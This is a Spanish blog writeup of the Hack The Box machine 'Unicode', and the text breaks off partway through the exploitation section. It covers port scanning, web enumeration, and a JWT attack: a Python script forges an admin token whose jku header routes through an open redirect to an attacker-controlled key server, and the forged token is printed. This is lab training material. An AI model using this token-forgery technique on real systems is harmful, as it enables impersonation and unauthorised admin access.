<!DOCTYPE html><html lang="es-ES" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Unicode Writeup" /><meta name="author" content="xdann1" /><meta property="og:locale" content="es_ES" /><meta name="description" content="Máquina Medium, crearemos un token malicioso en una web para hacernos pasar por un administrador, en el panel de administrador encontraremos un LFI, consiguiendo listar un archivo con credenciales, por último, vemos que podemos ejecutar un binario como root, lo ejecutamos y conseguimos leer la flag de root." /><meta property="og:description" content="Máquina Medium, crearemos un token malicioso en una web para hacernos pasar por un administrador, en el panel de administrador encontraremos un LFI, consiguiendo listar un archivo con credenciales, por último, vemos que podemos ejecutar un binario como root, lo ejecutamos y conseguimos leer la flag de root." /><link rel="canonical" href="https://xdann1.github.io/posts/writeup-unicode/" /><meta property="og:url" content="https://xdann1.github.io/posts/writeup-unicode/" /><meta property="og:site_name" content="xDaNN1" /><meta property="og:image" content="https://xdann1.github.io/assets/img/commons/unicode/unicode.png" /><meta property="og:image:height" content="500" /><meta property="og:image:width" content="800" /><meta property="og:image:alt" content="Banner Unicode" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-05-07T00:00:00+02:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://xdann1.github.io/assets/img/commons/unicode/unicode.png" /><meta name="twitter:image:alt" content="Banner Unicode" /><meta property="twitter:title" content="Unicode Writeup" /><meta name="twitter:site" content="@xdann1_" /><meta name="twitter:creator" content="@xDaNN1_" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"xdann1","url":"https://xdann1.github.io"},"dateModified":"2022-05-07T00:00:00+02:00","datePublished":"2022-05-07T00:00:00+02:00","description":"Máquina Medium, crearemos un token malicioso en una web para hacernos pasar por un administrador, en el panel de administrador encontraremos un LFI, consiguiendo listar un archivo con credenciales, por último, vemos que podemos ejecutar un binario como root, lo ejecutamos y conseguimos leer la flag de root.","headline":"Unicode Writeup","image":{"width":800,"height":500,"alt":"Banner Unicode","url":"https://xdann1.github.io/assets/img/commons/unicode/unicode.png","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://xdann1.github.io/posts/writeup-unicode/"},"url":"https://xdann1.github.io/posts/writeup-unicode/"}</script><title>Unicode Writeup | xDaNN1</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="xDaNN1"><meta name="application-name" content="xDaNN1"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/commons/avatar.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">xDaNN1</a></div><div class="site-subtitle font-italic">Cybersecurity enthusiast | CTF Player</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>INICIO</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORÍAS</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>ETIQUETAS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVO</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>SOBRE MÍ</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/xdann1" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/xdann1_" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="https://app.hackthebox.com/profile/535069" aria-label="hackthebox" target="_blank" rel="noopener"> <i class="fas fa-cube"></i> </a> <a href="https://www.linkedin.com/in/danielqueroperez/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a> <a href="" aria-label="" target="_blank" rel="noopener"> <i class=""></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Inicio </a> </span> <span>Unicode Writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Entrada</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Buscar..."> </span> <span id="search-cancel" >Cancelar</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 800 500'%3E%3C/svg%3E" data-src="../../assets/img/commons/unicode/unicode.png" class="preview-img bg" alt="Banner Unicode" width="800" height="500" data-proofer-ignore><h1 data-toc-skip>Unicode Writeup</h1><div class="post-meta text-muted"><div> Por <em> <a href="https://xdann1.github.io">xdann1</a> </em></div><div class="d-flex"><div> <span> Publicado <em class="timeago" data-ts="1651874400" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-05-07 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1680 palabras"> <em>9 min</em> de lectura</span></div></div></div><div class="post-content"><p>Máquina Medium, crearemos un token malicioso en una web para hacernos pasar por un administrador, en el panel de administrador encontraremos un LFI, consiguiendo listar un archivo con credenciales, por último, vemos que podemos ejecutar un binario como root, lo ejecutamos y conseguimos leer la flag de root.</p><h2 id="recopilación-de-información"><span class="mr-2">Recopilación de Información</span><a href="#recopilación-de-información" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Primero vamos a comprobar la conectividad con la máquina.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>❯ ping -c 1 10.10.11.126
PING 10.10.11.126 (10.10.11.126) 56(84) bytes of data.
64 bytes from 10.10.11.126: icmp_seq=1 ttl=63 time=34.9 ms

--- 10.10.11.126 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 34.921/34.921/34.921/0.000 ms
</pre></table></code></div></div><p>En la salida del comando anterior se puede ver un parámetro llamado <code class="language-plaintext highlighter-rouge">ttl</code>, gracias a este parámetro podemos saber que sistema operativo está corriendo en la máquina víctima.</p><ul><li>GNU/Linux = TTL 64<li>Windows = TTL 128</ul><p>En este caso, el sistema operativo que está corriendo en la máquina víctima es GNU/Linux.</p><p>Vamos a usar la herramienta <code class="language-plaintext highlighter-rouge">nmap</code> para descubrir que puertos están abiertos y que servicios estan asociados a estos.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.126 -oG allPorts
</pre></table></code></div></div><ul><li>-p- &gt; Escanea todos los puertos (65535)<li>–open &gt; Muestra solo los puertos con un estatus “open”<li>-sS &gt; Aplica un TCP SYN Scan<li>–min-rate 5000 &gt; Indica que quiero emitir paquetes no más lentos que 5000 paquetes por segundo<li>-vvv &gt; Muestra la información en pantalla a medida que se descubre<li>-n &gt; Indica que no aplique resolución DNS<li>-Pn &gt; Indica que no aplique el protocolo ARP<li>10.10.10.11.126 &gt; Dirección IP que se quiere escanear<li>-oG allPorts &gt; Exporta el output a un fichero grepeable con nombre “allPorts”</ul><p>Este sería el output del comando</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 23:44 CEST
Scanning 10.10.11.126 [65535 ports]
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
</pre></table></code></div></div><p>Ahora vamos a realizar un escaneo más profundo, también con <code class="language-plaintext highlighter-rouge">nmap</code> pero esta vez solamente lanzaremos scripts básicos de enumeración y analizaremos la versión de los puertos abiertos obtenidos anteriormente.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ nmap -p22,80 -sC -sV 10.10.11.126 -oN targeted
</pre></table></code></div></div><ul><li>-p22,80 &gt; Indica los puertos que se quieren escanear, en este caso el 22 y 80<li>-sC &gt; Lanza scripts básicos de enumeración<li>-sV &gt; Enumera la versión y servicio que está corriendo en los puertos<li>10.10.10.126 &gt; Dirección IP que se quiere escanear<li>-oN targeted &gt; Exporta el output a un fichero en formato nmap con nombre “targeted”</ul><p>Este sería el output del comando:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 23:47 CEST
Nmap scan report for 10.10.11.126
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fd:a0:f7:93:9e:d3:cc:bd:c2:3c:7f:92:35:70:d7:77 (RSA)
|   256 8b:b6:98:2d:fa:00:e5:e2:9c:8f:af:0f:44:99:03:b1 (ECDSA)
|_  256 c9:89:27:3e:91:cb:51:27:6f:39:89:36:10:41:df:7c (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: 503
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: nginx/1.18.0 (Ubuntu)
</pre></table></code></div></div><p>Los puertos abiertos y sus servicios asocidados son:</p><ul><li>22/tcp &gt; ssh<li>80/tcp &gt; http</ul><p>Empezaremos enumerando el puerto 80, primero podemos hacer un reconocimiento web con <code class="language-plaintext highlighter-rouge">dirsearch</code>, utilizaremos fuerza bruta para enumerar recursos.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>disearch -u http://10.10.11.126 -x 503
</pre></table></code></div></div><ul><li>-u http://10.10.11.126 &gt; Indica la url<li>-x 503 &gt; Oculta las peticiones con un código de estado</ul><p>Los recursos que hemos hallado son los siguientes:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>Target: http://10.10.11.126/

[00:34:38] Starting: 
[00:34:53] 308 -  264B  - /checkout  -&gt;  http://10.10.11.126/checkout/
[00:34:55] 308 -  266B  - /dashboard  -&gt;  http://10.10.11.126/dashboard/
[00:34:55] 308 -  258B  - /debug  -&gt;  http://10.10.11.126/debug/
[00:34:55] 502 -  568B  - /debug/
[00:34:56] 308 -  258B  - /error  -&gt;  http://10.10.11.126/error/
[00:34:59] 308 -  264B  - /internal  -&gt;  http://10.10.11.126/internal/
[00:35:01] 200 -  84KB  - /login/
[00:35:07] 308 -  264B  - /redirect  -&gt;  http://10.10.11.126/redirect/
[00:35:09] 404 -  564B  - /static/api/swagger.yaml
[00:35:09] 404 -  564B  - /static/api/swagger.json
[00:35:09] 404 -  564B  - /static/dump.sql
[00:35:12] 308 -  260B  - /upload  -&gt;  http://10.10.11.126/upload/
</pre></table></code></div></div><p>No tenemos nada demasiado interesante de momento, sigamos mirando que nos puede ofrecer la página. Si investigamos más a fondo podemos ver que estamos arrastrando una cookie.</p><p>Si observamos el código fuente de la página podemos encontrarnos con lo siguiente <code class="language-plaintext highlighter-rouge">/redirect/?url=google.com</code> esto nos puede servir para más adelante.</p><h1 id="busqueda-de-vulnerabilidades">Busqueda de vulnerabilidades</h1><p>Vamos a analizar la cookie que estamos arrastrando, parece que es un <code class="language-plaintext highlighter-rouge">JWT</code> (JSON Web Token), estos tokens estan divididos en 3 partes:</p><ul><li>Header &gt; usualmente consiste en dos partes, la primera parte (typ), indica el tipo de token y la segunda (alg) indica el algoritmo que ha sido utilizado.<li>Payload &gt; contiene parámetros del token, existen tres tipos de parámtros, registered, public y private.<li>Signature &gt; se utiliza para verificar que el emisor del JWT es quien dice ser y para garantizar que el mensaje no hay sido modificado, esta parte es creada firmando con el algoritmo especificado el header, el payload y una llave.</ul><p><img data-src="/assets/img/commons/unicode/partes.png" alt="Token JWT" class="center-image" data-proofer-ignore> <em>Partes Token JWT</em></p><p>Los tokens JWT podemos descifrarlos utilizando la siguiente <a href="https://jwt.io/">web</a>.</p><p><img data-src="/assets/img/commons/unicode/jwt.png" alt="Token JWT" class="center-image" data-proofer-ignore> <em>JWT Descifrado</em></p><p>En la parte de los headers vemos un parámetro llamado <code class="language-plaintext highlighter-rouge">jku</code>, este parámetro es una URI que apunta a un recurso con claves públicas codificadas en JSON, una de estas claves se corresponde con la utilizada para crear la parte <code class="language-plaintext highlighter-rouge">signature</code> del Token JWT.</p><p>Intentemos acceder a la url que contiene la clave que verifica los tokens, para ellos tendremos que añadir el dominio <code class="language-plaintext highlighter-rouge">hackmedia.htb</code> al fichero /etc/hosts.</p><div class="language-json highlighter-rouge"><div class="code-header"> <span data-label-text="JSON"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="p">{</span><span class="w">
    </span><span class="nl">"keys"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"kty"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RSA"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"use"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sig"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"kid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"hackthebox"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"alg"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RS256"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"n"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"e"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AQAB"</span><span class="w">
        </span><span class="p">}</span><span class="w">
    </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></pre></table></code></div></div><p>Puesto que la clave que se utiliza para verificar el token se extrae del certificado ubicado en la URI (jku), podríamos intentar generar un nuevo token malicioso que tenga como URI una clave alojada en nuestro servidor para así hacernos pasar por otro usuario.</p><h1 id="explotación">Explotación</h1><p>Primeramente crearemos las claves con las que verificaremos y crearemos el token.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>❯ openssl genrsa -out keypair.pem 2048
❯ openssl rsa -in keypair.pem -pubout -out publickey.crt
❯ openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
</pre></table></code></div></div><ul><li>publickey.crt &gt; clave pública<li>pkcs8.key &gt; clave privada</ul><p>Ya teniendo la clave pública y privada podremos crear un token malicioso. Utilizaremos el siguiente script para generarlo, este script manipula la URI del parámetro <code class="language-plaintext highlighter-rouge">jku</code> asignandole una URL con la pueda llegar a conectarse a nuestro servidor ayudandose de la ruta que encontramos al principio, asigna el valor admin al parámetro <code class="language-plaintext highlighter-rouge">user</code> y, finalmente firma el token con el par de claves.</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python3
</span>
<span class="kn">from</span> <span class="nn">email</span> <span class="kn">import</span> <span class="n">header</span>
<span class="kn">from</span> <span class="nn">jwcrypto</span> <span class="kn">import</span> <span class="n">jwk</span><span class="p">,</span> <span class="n">jwt</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"keypair.pem"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">pemfile</span><span class="p">:</span>
    <span class="n">key</span> <span class="o">=</span> <span class="n">jwk</span><span class="p">.</span><span class="n">JWK</span><span class="p">.</span><span class="n">from_pem</span><span class="p">(</span><span class="n">pemfile</span><span class="p">.</span><span class="n">read</span><span class="p">())</span>

<span class="n">Token</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="n">JWT</span><span class="p">(</span><span class="n">header</span><span class="o">=</span><span class="p">{</span><span class="s">"alg"</span><span class="p">:</span> <span class="s">"RS256"</span><span class="p">,</span><span class="s">"jku"</span><span class="p">:</span> <span class="s">"http://hackmedia.htb/static/../redirect?url=10.10.14.242:8080/jwks.json"</span><span class="p">},</span><span class="n">claims</span><span class="o">=</span><span class="p">{</span><span class="s">"user"</span><span class="p">:</span><span class="s">"admin"</span><span class="p">})</span>
<span class="n">Token</span><span class="p">.</span><span class="n">make_signed_token</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">Token</span><span class="p">.</span><span class="n">serialize</span><span class="p">())</span>
</pre></table></code></div></div><p>Este sería nuestro token malicioso:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy8uLi9yZWRpcmVjdD91cmw9MTAuMTAuMTQuMjQyOjgwODAvandrcy5qc29uIn0.eyJ1c2VyIjoiYWRtaW4ifQ.qRR4zH6-LJJuOmxVUIyuEzsW4ijqm1VnmUhDSZRVLSIOKFpC8Om5HssQGdLma3d-Zkw8gkISGy0mQ7J8hG9ODH1kinPnIL9u5BL4pyztmMUUqHXqIQ11EVmxH2gwL4laHKg86t_VZ3TwoIp7ruDbZ_Aaqu1ESPN0LpBevqKu54BgnFgogSqt8ruzzlU5IuQrje3zPf7g1QSr7sgARwIL5qRf19atR_lz-l-V411HZ5ItCRlsyr__r2QO3DtD03OuF2Wk8MJH4F1LjxEwB-M0v6W6JQf-bxx9AAoA401FBoP7_wES1T-SFjruU2gF8mHGdgk-5lWVnvS5R4zrwS8I8Q
</pre></table></code></div></div><p>Ahora generaremos el archivo que validará el token y que será apuntado por el parámetro <code class="language-plaintext highlighter-rouge">jku</code> de nuestro token malicioso. Para ello primero nos traeremos el que trae la máquina víctima.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ wget http://hackmedia.htb/static/jwks.json
</pre></table></code></div></div><p>Este fichero será al que apuntemos con el parametro <code class="language-plaintext highlighter-rouge">jku</code> para que nos valide el token, primero necesitaremos sustituir los parametros <code class="language-plaintext highlighter-rouge">n</code> y <code class="language-plaintext highlighter-rouge">e</code> de nuestra clave pública por los de el fichero jwks.json, para conseguir <code class="language-plaintext highlighter-rouge">n</code> y <code class="language-plaintext highlighter-rouge">e</code> de la clave pública utilizaremos el siguiente script:</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python3
</span>
<span class="kn">import</span> <span class="nn">jwkest</span>
<span class="kn">from</span> <span class="nn">Crypto.PublicKey</span> <span class="kn">import</span> <span class="n">RSA</span>

<span class="n">fp</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"publickey.crt"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">RSA</span><span class="p">.</span><span class="n">importKey</span><span class="p">(</span><span class="n">fp</span><span class="p">.</span><span class="n">read</span><span class="p">())</span>
<span class="n">fp</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>


<span class="k">print</span><span class="p">(</span><span class="s">"n:"</span><span class="p">,</span> <span class="n">jwkest</span><span class="p">.</span><span class="n">long_to_base64</span><span class="p">(</span><span class="n">key</span><span class="p">.</span><span class="n">n</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">"e:"</span><span class="p">,</span> <span class="n">jwkest</span><span class="p">.</span><span class="n">long_to_base64</span><span class="p">(</span><span class="n">key</span><span class="p">.</span><span class="n">e</span><span class="p">))</span>
</pre></table></code></div></div><ul><li>n: qV5Smp4lxwvgY8POIWXWpAsDDBatymCkAIxBS4sgsuk49Lb29zNiLififZz4v6z9VOywTxJBHi6a0t06QyeyfPg0roa8t-JqlDuWjAjF6F80nB4yBh-u6u8ggTRSR-cpLrr3d0QbNHTOQB2zrpCXuUW3uY-BUNk2QyPPCjzyZdO1RGZBEXtTo6CTZecEqFd0Li0cK9NywPzSqUuzzHe9pzmDMQONUezkcxTtN9tbcOiHMrsUTpwxzNeyGu9Mtt3gI2Hle6gYNFWdxsY7S642KYgRAu6OVi5nwwi46n2J41n7fnskk6Hzpr2o-jg93zMZfit1JV2rRLG__p-k1EldaQ<li>e: AQAB</ul><p>Cuando ya hayamos sustituido los parámetros <code class="language-plaintext highlighter-rouge">n</code> y <code class="language-plaintext highlighter-rouge">e</code> en el archivo jwks.json y tengamos preparado el token malicioso nos levantaremos un servidor web para que cuando se vaya a validar el token pueda apuntar al archivo que tenemos en local.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre 